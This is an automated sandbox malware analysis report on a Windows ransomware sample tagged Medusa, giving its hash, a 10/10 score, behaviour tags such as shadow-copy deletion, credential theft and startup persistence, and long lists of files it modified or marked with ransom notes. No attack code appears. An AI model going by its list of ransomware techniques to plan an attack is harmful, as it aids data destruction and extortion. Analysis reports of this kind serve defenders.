Malware Analysis Report

2024-12-07 17:08

Sample ID 241001-qm6f9a1gjk
Target 2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike
SHA256 6b807f9f7c8f24f436b0bab25cb38583bf4c051ea779fcdbb215af8a9a7f64de
Tags
medusaransomware credential_access defense_evasion discovery execution impact ransomware spyware stealer persistence
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

6b807f9f7c8f24f436b0bab25cb38583bf4c051ea779fcdbb215af8a9a7f64de

Threat Level: Known bad

The file 2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike was found to be: Known bad.

Malicious Activity Summary

medusaransomware credential_access defense_evasion discovery execution impact ransomware spyware stealer persistence

Medusa Ransomware

Renames multiple (8855) files with added filename extension

Deletes shadow copies

Renames multiple (8843) files with added filename extension

Boot or Logon Autostart Execution: Active Setup

Credentials from Password Stores: Windows Credential Manager

Reads user/profile data of web browsers

Drops startup file

Network Share Discovery

Enumerates connected drives

Drops desktop.ini file(s)

Drops file in Program Files directory

Browser Information Discovery

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Modifies registry class

Uses Volume Shadow Copy service COM API

Runs net.exe

Interacts with shadow copies

Runs ping.exe

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-01 13:23

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-01 13:23

Reported

2024-10-01 13:26

Platform

win7-20240903-en

Max time kernel

34s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe"

Signatures

Medusa Ransomware

ransomware medusaransomware

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (8855) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GUJ7UW2N\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\GY8QW6M2\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\75GKCLJR\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1846800975-3917212583-2893086201-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\3W44XPEP\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8O71085\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\L7XNHY48\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1846800975-3917212583-2893086201-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A

Network Share Discovery

discovery

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CANYON\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18187_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows NT\Accessories\it-IT\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSPTLS.DLL C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RECS.ICO C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01013_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\VIEW.JS C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187829.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyResume.dotx C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\de-DE\TableTextService.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\ja-JP\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14985_.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115844.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21480_.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\Tasks.accdt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
